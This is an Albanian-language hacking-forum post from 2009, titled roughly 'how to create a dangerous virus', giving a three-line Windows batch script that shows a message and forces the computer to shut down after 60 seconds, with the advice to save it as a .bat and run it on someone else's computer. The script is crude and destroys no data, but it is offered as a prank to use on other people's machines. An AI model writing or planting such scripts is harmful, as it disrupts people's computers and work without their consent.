Drenica Hackers GrouP

Drenica Hackers Group
 
ForumForum  Drenica-HackersDrenica-Hackers  PytësoriPytësori  KërkoKërko  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 Si te krijojm Nje virus te rrezikshem

Shko poshtë 
AutoriMesazh
pr0xy g33k
V.I.P
V.I.P
pr0xy g33k

Numri i postimeve : 85
Poenat e Antarit : 243
Thanks : 1
Join date : 26/06/2009
Age : 22
Location : macedonian

MesazhTitulli: Si te krijojm Nje virus te rrezikshem   Sat Jun 27, 2009 11:32 am

1.Hapim Notepad
2.E Shkruajm Kete:

@echo
msg * System-Coder
shutdown -s -t 60 -c "System-Coder WHG"

3.Dhe E Ruajm SiTeDoni.bat

po menoj naj kujt ne kompjuter me ja ba... jo ne te juvin se nuk qelet ma

aiit klm?
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
Si te krijojm Nje virus te rrezikshem
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Drenica Hackers GrouP  :: INFORMATIKA :: Tutoriale/Mësime-
Kërce tek: